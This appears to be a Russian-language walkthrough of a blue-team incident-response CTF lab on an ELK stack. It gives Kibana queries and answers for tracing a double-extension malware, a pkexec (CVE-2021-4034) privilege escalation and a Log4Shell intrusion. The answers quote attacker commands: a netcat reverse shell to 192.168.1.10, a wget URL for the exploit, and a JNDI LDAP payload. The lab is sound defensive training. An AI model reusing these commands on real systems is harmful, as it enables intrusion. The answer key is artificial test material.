Добрый день. Сегодня у нас решение лабораторной работе на базе ELK стэка Elastic-Case, Category : Incident response - https://cyberdefenders.org/blueteam-ctf-challenges/90#nav-questions
Для поиска необходимых событий будут использованы KQL (Kibana Query Language - это там, где пустая строка, и туда надо что-то вписыать. И EQL (Elastic Query Language) - это панелька чуть ниже, где фильтры показаны определенными плитками.
- Who downloads the malicious file which has a double extension?
KQL: *.*.*
EQL: file.name: exists
Answer: ahmed
2. What is the hostname he was using?
KQL: *.*.*
EQL: file.name: exists
Answer: DESKTOP-Q1SL9P2
3. What is the name of the malicious file?
KQL: *.*.*
EQL: file.name: exists
Answer: Acount_details.pdf.exe
4. What is the attacker's IP address?
EQL: process.name: Acount_details.pdf.exe, source.ip:exists
Answer: 192.168.1.10
5. Another user with high privilege runs the same malicious file. What is the username?
EQL: process.name: Acount_details.pdf.exe, source.ip:exists, not user.name: ahmed
Answer: Cybery
6. The attacker was able to upload a DLL file of size 8704. What is the file name?
KQL:*.dll
EQL: file.size: exist, file.size:8, 704
Answer: mCblHDgWP.dll
7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?
KQL: 10716
Answer: rundll32.exe
8. The previous process was able to access a registry. What is the full path of the registry?
EQL: process.name: rundll32.exe, registry.path: exists
Answer: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
9. PowerShell process with pid 8836 changed a file in the system. What was that filename?
EQL: process.name: powershell.exe, file.path:exists, proces.pid: 8836, event.action: overwrite
Answer: ModuleAnalysisCache
10. PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?
EQL: process.name: powershell.exe, process.pid: 11676, event.action:creation
Answer: __PSScriptPolicyTest_bymwxuft.3b5.ps1
11. What is the machine's IP address that is in the same LAN as a windows machine?
KQL: 192.168.10.10
EQL: host.os: windows, host.os.platform: windows
Answer: 192.168.10.30
12. The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?
KQL: ubuntu and login
EQL: event.type: start, event.type: authentification_success
Answer: Salem
13. After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?
KQL: wget
EQL: process.args: exists
Answer: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py
14. After The attacker runs the exploit, which spawns a new process called pkexec, what is the process's md5 hash?
EQL: process.name: pkexec, process.hash.md5: exists
Answer: 3a4ad518e9e404a6bad3d39dfebaf2f6
15. Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?
EQL: process.command_line: exists, user.name: root, process.parent.pid: 3011
Answer: bash -i
16. What is the hostname which alert signal.rule.name: "Netcat Network Activity"?
Так как индекса sugnal.rule.name нет в индекс паттернах, зайдем во вкладку на боковой панели Security -> Alerts
Answer: CentOS
17. What is the username who ran netcat?
Answer: solr
18. What is the parent process name of netcat?
KQL: nc
Answer: Java
19. If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?
KQL: nc
Answer: nc -e /bin/bash 192.168.1.10 9999
20. From the previous three questions, you may remember a famous java vulnerability. What is it?
Вы можете вспомнить, что это уязвимость Log4Shell, ну или попросту загуглите. Да, так тоже можно
Answer: Log4Shell
21. What is the entire log file path of the "solr" application?
KQL: solr
EQL: user.name: solr, file.path: exists
Answer: /var/solr/logs/solr.log
22. What is the path that is vulnerable to log4j?
KQL: *jndi*
Answer: /admin/cores
23. What is the GET request parameter used to deliver log4j payload?
Answer: foo
24. What is the JNDI payload that is connected to the LDAP port?
Answer: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}
